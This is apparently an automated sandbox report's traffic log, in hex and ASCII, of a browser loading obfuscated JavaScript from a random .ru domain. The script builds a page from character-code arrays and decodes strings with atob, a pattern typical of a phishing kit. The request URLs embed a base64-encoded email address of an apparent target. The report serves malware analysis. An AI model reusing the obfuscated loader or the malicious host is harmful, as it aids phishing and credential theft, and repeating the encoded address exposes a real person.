                                                                                                                                                                                    2024-01-26 13:41:50 UTC1369INData Raw: 78 72 78 5b 32 30 35 5d 20 3d 20 31 30 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 32 30 36 5d 20 3d 20 31 30 32 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 32 30 37 5d 20 3d 20 31 31 37 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 32 30 38 5d 20 3d 20 31 31 30 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 32 30 39 5d 20 3d 20 39 39 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 32 31 30 5d 20 3d 20 31 31 36 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 32 31 31 5d 20 3d 20 31 30 35 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 32 31 32 5d 20 3d 20 31 31 31 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 32 31 33 5d 20 3d 20 31 31 30 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 32 31 34 5d 20 3d 20 33 32 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 32 31 35 5d 20 3d 20 31 31 36 3b 0a 70 4d
                                                                                                                                                                                    Data Ascii: xrx[205] = 10;pMrViysVxrx[206] = 102;pMrViysVxrx[207] = 117;pMrViysVxrx[208] = 110;pMrViysVxrx[209] = 99;pMrViysVxrx[210] = 116;pMrViysVxrx[211] = 105;pMrViysVxrx[212] = 111;pMrViysVxrx[213] = 110;pMrViysVxrx[214] = 32;pMrViysVxrx[215] = 116;pM
                                                                                                                                                                                    2024-01-26 13:41:50 UTC1369INData Raw: 36 33 5d 20 3d 20 36 39 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 32 36 34 5d 20 3d 20 33 32 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 32 36 35 5d 20 3d 20 36 31 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 32 36 36 5d 20 3d 20 33 32 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 32 36 37 5d 20 3d 20 39 37 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 32 36 38 5d 20 3d 20 31 31 36 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 32 36 39 5d 20 3d 20 31 31 31 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 32 37 30 5d 20 3d 20 39 38 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 32 37 31 5d 20 3d 20 34 30 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 32 37 32 5d 20 3d 20 36 37 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 32 37 33 5d 20 3d 20 36 36 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 32
                                                                                                                                                                                    Data Ascii: 63] = 69;pMrViysVxrx[264] = 32;pMrViysVxrx[265] = 61;pMrViysVxrx[266] = 32;pMrViysVxrx[267] = 97;pMrViysVxrx[268] = 116;pMrViysVxrx[269] = 111;pMrViysVxrx[270] = 98;pMrViysVxrx[271] = 40;pMrViysVxrx[272] = 67;pMrViysVxrx[273] = 66;pMrViysVxrx[2
                                                                                                                                                                                    2024-01-26 13:41:50 UTC1369INData Raw: 56 69 79 73 56 78 72 78 5b 33 32 32 5d 20 3d 20 31 31 39 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 32 33 5d 20 3d 20 37 38 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 32 34 5d 20 3d 20 37 31 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 32 35 5d 20 3d 20 31 31 39 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 32 36 5d 20 3d 20 38 38 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 32 37 5d 20 3d 20 36 37 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 32 38 5d 20 3d 20 38 35 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 32 39 5d 20 3d 20 38 38 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 33 30 5d 20 3d 20 31 30 33 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 33 31 5d 20 3d 20 37 35 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 33 32 5d 20 3d 20 36 39 3b 0a 70 4d
                                                                                                                                                                                    Data Ascii: ViysVxrx[322] = 119;pMrViysVxrx[323] = 78;pMrViysVxrx[324] = 71;pMrViysVxrx[325] = 119;pMrViysVxrx[326] = 88;pMrViysVxrx[327] = 67;pMrViysVxrx[328] = 85;pMrViysVxrx[329] = 88;pMrViysVxrx[330] = 103;pMrViysVxrx[331] = 75;pMrViysVxrx[332] = 69;pM
                                                                                                                                                                                    2024-01-26 13:41:50 UTC1369INData Raw: 20 3d 20 31 33 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 38 31 5d 20 3d 20 31 30 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 38 32 5d 20 3d 20 31 33 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 38 33 5d 20 3d 20 31 30 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 38 34 5d 20 3d 20 31 33 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 38 35 5d 20 3d 20 31 30 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 38 36 5d 20 3d 20 31 31 38 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 38 37 5d 20 3d 20 39 37 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 38 38 5d 20 3d 20 31 31 34 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 38 39 5d 20 3d 20 33 32 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 39 30 5d 20 3d 20 39 30 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 39 31 5d
                                                                                                                                                                                    Data Ascii: = 13;pMrViysVxrx[381] = 10;pMrViysVxrx[382] = 13;pMrViysVxrx[383] = 10;pMrViysVxrx[384] = 13;pMrViysVxrx[385] = 10;pMrViysVxrx[386] = 118;pMrViysVxrx[387] = 97;pMrViysVxrx[388] = 114;pMrViysVxrx[389] = 32;pMrViysVxrx[390] = 90;pMrViysVxrx[391]
                                                                                                                                                                                    2024-01-26 13:41:50 UTC1369INData Raw: 78 5b 34 33 39 5d 20 3d 20 31 31 36 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 34 34 30 5d 20 3d 20 31 31 36 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 34 34 31 5d 20 3d 20 38 35 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 34 34 32 5d 20 3d 20 36 39 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 34 34 33 5d 20 3d 20 31 30 37 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 34 34 34 5d 20 3d 20 31 31 37 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 34 34 35 5d 20 3d 20 38 30 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 34 34 36 5d 20 3d 20 37 36 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 34 34 37 5d 20 3d 20 31 30 35 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 34 34 38 5d 20 3d 20 31 30 33 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 34 34 39 5d 20 3d 20 31 31 38 3b 0a 70 4d 72 56 69
                                                                                                                                                                                    Data Ascii: x[439] = 116;pMrViysVxrx[440] = 116;pMrViysVxrx[441] = 85;pMrViysVxrx[442] = 69;pMrViysVxrx[443] = 107;pMrViysVxrx[444] = 117;pMrViysVxrx[445] = 80;pMrViysVxrx[446] = 76;pMrViysVxrx[447] = 105;pMrViysVxrx[448] = 103;pMrViysVxrx[449] = 118;pMrVi
                                                                                                                                                                                    2024-01-26 13:41:50 UTC1369INData Raw: 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 34 39 38 5d 20 3d 20 31 30 35 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 34 39 39 5d 20 3d 20 31 31 32 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 35 30 30 5d 20 3d 20 31 31 32 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 35 30 31 5d 20 3d 20 38 35 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 35 30 32 5d 20 3d 20 38 39 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 35 30 33 5d 20 3d 20 31 30 32 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 35 30 34 5d 20 3d 20 38 31 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 35 30 35 5d 20 3d 20 34 31 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 35 30 36 5d 20 3d 20 34 31 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 35 30 37 5d 20 3d 20 33 32 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 35 30 38 5d 20 3d 20
                                                                                                                                                                                    Data Ascii: ;pMrViysVxrx[498] = 105;pMrViysVxrx[499] = 112;pMrViysVxrx[500] = 112;pMrViysVxrx[501] = 85;pMrViysVxrx[502] = 89;pMrViysVxrx[503] = 102;pMrViysVxrx[504] = 81;pMrViysVxrx[505] = 41;pMrViysVxrx[506] = 41;pMrViysVxrx[507] = 32;pMrViysVxrx[508] =


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    36192.168.2.1649771104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:50 UTC865OUTGET /VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29t HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/hIdlMLOfWxySOTr9FfmxCijqf/
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:41:51 UTC746INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:51 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jiThYh%2B3F5aN4TrsdvLGj%2BAuklTACJbbaESZhCYAkMwL3R0C2ux0IhhdxW3%2BsT0mm%2FPYGorhQXW2q7%2F%2BYvlMc8ULRsfnNbLfqq0LvckY85P5r3CFFlhZjfhCW3WiVb4d%2FClh9yDkIKH1XtY85qJug6ON1gs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d02adfa6777-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:51 UTC623INData Raw: 32 37 34 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 76 61 72 20 4d 6d 52 41 49 56 47 5a 52 6c 72 78 4f 20 3d 20 27 45 64 68 79 67 4f 77 47 69 27 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 68 6e 79 46 52 74 45 4a 48 44 53 72 74 28 75 56 4d 4d 52 6d 57 70 7a 6e 68 47 67 78 2c 20 4e 4c 6b 4e 4c 4b 62 50 6b 69 53 72 6d 29 20 7b 0d 0a 09 6c 65 74 20 53 4e 77 49 65 7a 59 61 20 3d 20 27 27 3b 0d 0a 09 75 56 4d 4d 52 6d 57 70 7a 6e 68 47 67 78 20 3d 20 61 74 6f 62 28 75 56 4d 4d 52 6d 57 70 7a 6e 68 47 67 78 29 3b 0d 0a 09 6c 65 74 20 4c 74 63 61 55 67 79 42 44 20 3d 20 4e 4c 6b 4e 4c 4b 62 50 6b 69 53 72 6d 2e 6c 65 6e 67 74 68 3b 0d 0a 0d 0a 09 66 6f 72 20 28 6c 65 74 20 69 20 3d 20 30 3b 20 69 20 3c 20 75 56 4d 4d 52 6d 57 70 7a 6e 68 47 67 78 2e 6c 65 6e 67 74 68 3b 20 69
                                                                                                                                                                                    Data Ascii: 274<script>var MmRAIVGZRlrxO = 'EdhygOwGi';function hnyFRtEJHDSrt(uVMMRmWpznhGgx, NLkNLKbPkiSrm) {let SNwIezYa = '';uVMMRmWpznhGgx = atob(uVMMRmWpznhGgx);let LtcaUgyBD = NLkNLKbPkiSrm.length;for (let i = 0; i < uVMMRmWpznhGgx.length; i
                                                                                                                                                                                    2024-01-26 13:41:51 UTC12INData Raw: 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a
                                                                                                                                                                                    Data Ascii: </script>
                                                                                                                                                                                    2024-01-26 13:41:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    37192.168.2.1649772104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:51 UTC750OUTGET /VyRsmGftiIlOxrabXBIOtQtS/0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29t HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29t
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:41:51 UTC748INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:51 GMT
                                                                                                                                                                                    Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8evZnUUC85QhN4yS%2Bh8LludvKpf0lHcvgHmzEIzVFK%2FgfS2%2BWn5xnsAwK%2Bv%2BaEyLY8nz0au5rnCm1O7tRg5rerWfMyYfq%2BGynQg0JxZZJFIU47Ly%2FKUOrJu2Ryw7hr%2FQl17HsEXRhun%2FV7sboF6VlEJglr4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d051b1fb08e-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:51 UTC621INData Raw: 37 63 63 32 0d 0a 76 61 72 20 50 57 44 4d 67 64 65 61 57 20 3d 20 6e 65 77 20 41 72 72 61 79 3b 0a 50 57 44 4d 67 64 65 61 57 5b 30 5d 20 3d 20 36 30 3b 0a 50 57 44 4d 67 64 65 61 57 5b 31 5d 20 3d 20 33 33 3b 0a 50 57 44 4d 67 64 65 61 57 5b 32 5d 20 3d 20 36 38 3b 0a 50 57 44 4d 67 64 65 61 57 5b 33 5d 20 3d 20 37 39 3b 0a 50 57 44 4d 67 64 65 61 57 5b 34 5d 20 3d 20 36 37 3b 0a 50 57 44 4d 67 64 65 61 57 5b 35 5d 20 3d 20 38 34 3b 0a 50 57 44 4d 67 64 65 61 57 5b 36 5d 20 3d 20 38 39 3b 0a 50 57 44 4d 67 64 65 61 57 5b 37 5d 20 3d 20 38 30 3b 0a 50 57 44 4d 67 64 65 61 57 5b 38 5d 20 3d 20 36 39 3b 0a 50 57 44 4d 67 64 65 61 57 5b 39 5d 20 3d 20 33 32 3b 0a 50 57 44 4d 67 64 65 61 57 5b 31 30 5d 20 3d 20 31 30 34 3b 0a 50 57 44 4d 67 64 65 61 57 5b 31
                                                                                                                                                                                    Data Ascii: 7cc2var PWDMgdeaW = new Array;PWDMgdeaW[0] = 60;PWDMgdeaW[1] = 33;PWDMgdeaW[2] = 68;PWDMgdeaW[3] = 79;PWDMgdeaW[4] = 67;PWDMgdeaW[5] = 84;PWDMgdeaW[6] = 89;PWDMgdeaW[7] = 80;PWDMgdeaW[8] = 69;PWDMgdeaW[9] = 32;PWDMgdeaW[10] = 104;PWDMgdeaW[1
                                                                                                                                                                                    2024-01-26 13:41:51 UTC1369INData Raw: 67 64 65 61 57 5b 32 39 5d 20 3d 20 33 34 3b 0a 50 57 44 4d 67 64 65 61 57 5b 33 30 5d 20 3d 20 33 32 3b 0a 50 57 44 4d 67 64 65 61 57 5b 33 31 5d 20 3d 20 31 30 38 3b 0a 50 57 44 4d 67 64 65 61 57 5b 33 32 5d 20 3d 20 39 37 3b 0a 50 57 44 4d 67 64 65 61 57 5b 33 33 5d 20 3d 20 31 31 30 3b 0a 50 57 44 4d 67 64 65 61 57 5b 33 34 5d 20 3d 20 31 30 33 3b 0a 50 57 44 4d 67 64 65 61 57 5b 33 35 5d 20 3d 20 36 31 3b 0a 50 57 44 4d 67 64 65 61 57 5b 33 36 5d 20 3d 20 33 34 3b 0a 50 57 44 4d 67 64 65 61 57 5b 33 37 5d 20 3d 20 31 30 31 3b 0a 50 57 44 4d 67 64 65 61 57 5b 33 38 5d 20 3d 20 31 31 30 3b 0a 50 57 44 4d 67 64 65 61 57 5b 33 39 5d 20 3d 20 33 34 3b 0a 50 57 44 4d 67 64 65 61 57 5b 34 30 5d 20 3d 20 36 32 3b 0a 50 57 44 4d 67 64 65 61 57 5b 34 31 5d 20
                                                                                                                                                                                    Data Ascii: gdeaW[29] = 34;PWDMgdeaW[30] = 32;PWDMgdeaW[31] = 108;PWDMgdeaW[32] = 97;PWDMgdeaW[33] = 110;PWDMgdeaW[34] = 103;PWDMgdeaW[35] = 61;PWDMgdeaW[36] = 34;PWDMgdeaW[37] = 101;PWDMgdeaW[38] = 110;PWDMgdeaW[39] = 34;PWDMgdeaW[40] = 62;PWDMgdeaW[41]
                                                                                                                                                                                    2024-01-26 13:41:51 UTC1369INData Raw: 35 5d 20 3d 20 31 30 34 3b 0a 50 57 44 4d 67 64 65 61 57 5b 39 36 5d 20 3d 20 34 34 3b 0a 50 57 44 4d 67 64 65 61 57 5b 39 37 5d 20 3d 20 33 32 3b 0a 50 57 44 4d 67 64 65 61 57 5b 39 38 5d 20 3d 20 31 30 35 3b 0a 50 57 44 4d 67 64 65 61 57 5b 39 39 5d 20 3d 20 31 31 30 3b 0a 50 57 44 4d 67 64 65 61 57 5b 31 30 30 5d 20 3d 20 31 30 35 3b 0a 50 57 44 4d 67 64 65 61 57 5b 31 30 31 5d 20 3d 20 31 31 36 3b 0a 50 57 44 4d 67 64 65 61 57 5b 31 30 32 5d 20 3d 20 31 30 35 3b 0a 50 57 44 4d 67 64 65 61 57 5b 31 30 33 5d 20 3d 20 39 37 3b 0a 50 57 44 4d 67 64 65 61 57 5b 31 30 34 5d 20 3d 20 31 30 38 3b 0a 50 57 44 4d 67 64 65 61 57 5b 31 30 35 5d 20 3d 20 34 35 3b 0a 50 57 44 4d 67 64 65 61 57 5b 31 30 36 5d 20 3d 20 31 31 35 3b 0a 50 57 44 4d 67 64 65 61 57 5b 31
                                                                                                                                                                                    Data Ascii: 5] = 104;PWDMgdeaW[96] = 44;PWDMgdeaW[97] = 32;PWDMgdeaW[98] = 105;PWDMgdeaW[99] = 110;PWDMgdeaW[100] = 105;PWDMgdeaW[101] = 116;PWDMgdeaW[102] = 105;PWDMgdeaW[103] = 97;PWDMgdeaW[104] = 108;PWDMgdeaW[105] = 45;PWDMgdeaW[106] = 115;PWDMgdeaW[1
                                                                                                                                                                                    2024-01-26 13:41:51 UTC1369INData Raw: 5b 31 35 39 5d 20 3d 20 31 30 36 3b 0a 50 57 44 4d 67 64 65 61 57 5b 31 36 30 5d 20 3d 20 31 31 32 3b 0a 50 57 44 4d 67 64 65 61 57 5b 31 36 31 5d 20 3d 20 38 31 3b 0a 50 57 44 4d 67 64 65 61 57 5b 31 36 32 5d 20 3d 20 31 30 34 3b 0a 50 57 44 4d 67 64 65 61 57 5b 31 36 33 5d 20 3d 20 38 33 3b 0a 50 57 44 4d 67 64 65 61 57 5b 31 36 34 5d 20 3d 20 31 30 37 3b 0a 50 57 44 4d 67 64 65 61 57 5b 31 36 35 5d 20 3d 20 36 38 3b 0a 50 57 44 4d 67 64 65 61 57 5b 31 36 36 5d 20 3d 20 31 32 30 3b 0a 50 57 44 4d 67 64 65 61 57 5b 31 36 37 5d 20 3d 20 38 34 3b 0a 50 57 44 4d 67 64 65 61 57 5b 31 36 38 5d 20 3d 20 34 37 3b 0a 50 57 44 4d 67 64 65 61 57 5b 31 36 39 5d 20 3d 20 34 39 3b 0a 50 57 44 4d 67 64 65 61 57 5b 31 37 30 5d 20 3d 20 37 31 3b 0a 50 57 44 4d 67 64 65
                                                                                                                                                                                    Data Ascii: [159] = 106;PWDMgdeaW[160] = 112;PWDMgdeaW[161] = 81;PWDMgdeaW[162] = 104;PWDMgdeaW[163] = 83;PWDMgdeaW[164] = 107;PWDMgdeaW[165] = 68;PWDMgdeaW[166] = 120;PWDMgdeaW[167] = 84;PWDMgdeaW[168] = 47;PWDMgdeaW[169] = 49;PWDMgdeaW[170] = 71;PWDMgde
                                                                                                                                                                                    2024-01-26 13:41:51 UTC1369INData Raw: 3b 0a 50 57 44 4d 67 64 65 61 57 5b 32 32 33 5d 20 3d 20 31 30 36 3b 0a 50 57 44 4d 67 64 65 61 57 5b 32 32 34 5d 20 3d 20 39 37 3b 0a 50 57 44 4d 67 64 65 61 57 5b 32 32 35 5d 20 3d 20 31 31 38 3b 0a 50 57 44 4d 67 64 65 61 57 5b 32 32 36 5d 20 3d 20 39 37 3b 0a 50 57 44 4d 67 64 65 61 57 5b 32 32 37 5d 20 3d 20 31 31 35 3b 0a 50 57 44 4d 67 64 65 61 57 5b 32 32 38 5d 20 3d 20 39 39 3b 0a 50 57 44 4d 67 64 65 61 57 5b 32 32 39 5d 20 3d 20 31 31 34 3b 0a 50 57 44 4d 67 64 65 61 57 5b 32 33 30 5d 20 3d 20 31 30 35 3b 0a 50 57 44 4d 67 64 65 61 57 5b 32 33 31 5d 20 3d 20 31 31 32 3b 0a 50 57 44 4d 67 64 65 61 57 5b 32 33 32 5d 20 3d 20 31 31 36 3b 0a 50 57 44 4d 67 64 65 61 57 5b 32 33 33 5d 20 3d 20 33 34 3b 0a 50 57 44 4d 67 64 65 61 57 5b 32 33 34 5d 20
                                                                                                                                                                                    Data Ascii: ;PWDMgdeaW[223] = 106;PWDMgdeaW[224] = 97;PWDMgdeaW[225] = 118;PWDMgdeaW[226] = 97;PWDMgdeaW[227] = 115;PWDMgdeaW[228] = 99;PWDMgdeaW[229] = 114;PWDMgdeaW[230] = 105;PWDMgdeaW[231] = 112;PWDMgdeaW[232] = 116;PWDMgdeaW[233] = 34;PWDMgdeaW[234]
                                                                                                                                                                                    2024-01-26 13:41:51 UTC1369INData Raw: 36 5d 20 3d 20 31 30 31 3b 0a 50 57 44 4d 67 64 65 61 57 5b 32 38 37 5d 20 3d 20 31 31 34 3b 0a 50 57 44 4d 67 64 65 61 57 5b 32 38 38 5d 20 3d 20 34 34 3b 0a 50 57 44 4d 67 64 65 61 57 5b 32 38 39 5d 20 3d 20 34 36 3b 0a 50 57 44 4d 67 64 65 61 57 5b 32 39 30 5d 20 3d 20 31 31 31 3b 0a 50 57 44 4d 67 64 65 61 57 5b 32 39 31 5d 20 3d 20 31 31 38 3b 0a 50 57 44 4d 67 64 65 61 57 5b 32 39 32 5d 20 3d 20 31 30 31 3b 0a 50 57 44 4d 67 64 65 61 57 5b 32 39 33 5d 20 3d 20 31 31 34 3b 0a 50 57 44 4d 67 64 65 61 57 5b 32 39 34 5d 20 3d 20 31 30 38 3b 0a 50 57 44 4d 67 64 65 61 57 5b 32 39 35 5d 20 3d 20 39 37 3b 0a 50 57 44 4d 67 64 65 61 57 5b 32 39 36 5d 20 3d 20 31 32 31 3b 0a 50 57 44 4d 67 64 65 61 57 5b 32 39 37 5d 20 3d 20 31 32 33 3b 0a 50 57 44 4d 67 64
                                                                                                                                                                                    Data Ascii: 6] = 101;PWDMgdeaW[287] = 114;PWDMgdeaW[288] = 44;PWDMgdeaW[289] = 46;PWDMgdeaW[290] = 111;PWDMgdeaW[291] = 118;PWDMgdeaW[292] = 101;PWDMgdeaW[293] = 114;PWDMgdeaW[294] = 108;PWDMgdeaW[295] = 97;PWDMgdeaW[296] = 121;PWDMgdeaW[297] = 123;PWDMgd
                                                                                                                                                                                    2024-01-26 13:41:51 UTC1369INData Raw: 20 3d 20 35 39 3b 0a 50 57 44 4d 67 64 65 61 57 5b 33 35 30 5d 20 3d 20 39 38 3b 0a 50 57 44 4d 67 64 65 61 57 5b 33 35 31 5d 20 3d 20 39 37 3b 0a 50 57 44 4d 67 64 65 61 57 5b 33 35 32 5d 20 3d 20 39 39 3b 0a 50 57 44 4d 67 64 65 61 57 5b 33 35 33 5d 20 3d 20 31 30 37 3b 0a 50 57 44 4d 67 64 65 61 57 5b 33 35 34 5d 20 3d 20 31 30 33 3b 0a 50 57 44 4d 67 64 65 61 57 5b 33 35 35 5d 20 3d 20 31 31 34 3b 0a 50 57 44 4d 67 64 65 61 57 5b 33 35 36 5d 20 3d 20 31 31 31 3b 0a 50 57 44 4d 67 64 65 61 57 5b 33 35 37 5d 20 3d 20 31 31 37 3b 0a 50 57 44 4d 67 64 65 61 57 5b 33 35 38 5d 20 3d 20 31 31 30 3b 0a 50 57 44 4d 67 64 65 61 57 5b 33 35 39 5d 20 3d 20 31 30 30 3b 0a 50 57 44 4d 67 64 65 61 57 5b 33 36 30 5d 20 3d 20 35 38 3b 0a 50 57 44 4d 67 64 65 61 57 5b
                                                                                                                                                                                    Data Ascii: = 59;PWDMgdeaW[350] = 98;PWDMgdeaW[351] = 97;PWDMgdeaW[352] = 99;PWDMgdeaW[353] = 107;PWDMgdeaW[354] = 103;PWDMgdeaW[355] = 114;PWDMgdeaW[356] = 111;PWDMgdeaW[357] = 117;PWDMgdeaW[358] = 110;PWDMgdeaW[359] = 100;PWDMgdeaW[360] = 58;PWDMgdeaW[
